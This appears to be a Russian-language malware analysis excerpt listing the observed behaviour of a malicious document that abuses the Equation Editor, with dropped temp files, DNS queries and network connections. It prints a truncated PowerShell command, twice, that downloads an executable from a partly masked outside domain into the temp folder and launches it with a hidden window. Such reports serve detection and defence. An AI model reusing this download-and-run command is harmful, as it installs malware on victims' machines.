Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$xI=$env:temp+'\Qmd.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/jnsjdnwjs/DECLIN.exe' -Destination $xI;(New-Object -com Shel...
- qmd.exe
- %TEMP%\bit5899.tmp
- %TEMP%\bit1e4e.tmp
- %TEMP%\bit1e4e.tmp
- %TEMP%\bit5899.tmp
- %TEMP%\bit5899.tmp в %TEMP%\qmd.exe
- %TEMP%\bit1e4e.tmp в %TEMP%\qmd.exe
- 'br######ia-worldwide.co.uk':80
- '17#.#3.162.253':80
- http://br######ia-worldwide.co.uk/jnsjdnwjs/DECLIN.exe
- DNS ASK br######ia-worldwide.co.uk
- '%TEMP%\qmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$xI=$env:temp+'\Qmd.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/jnsjdnwjs/DECLIN.exe' -Destination $xI;(New-Object -com Shel...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding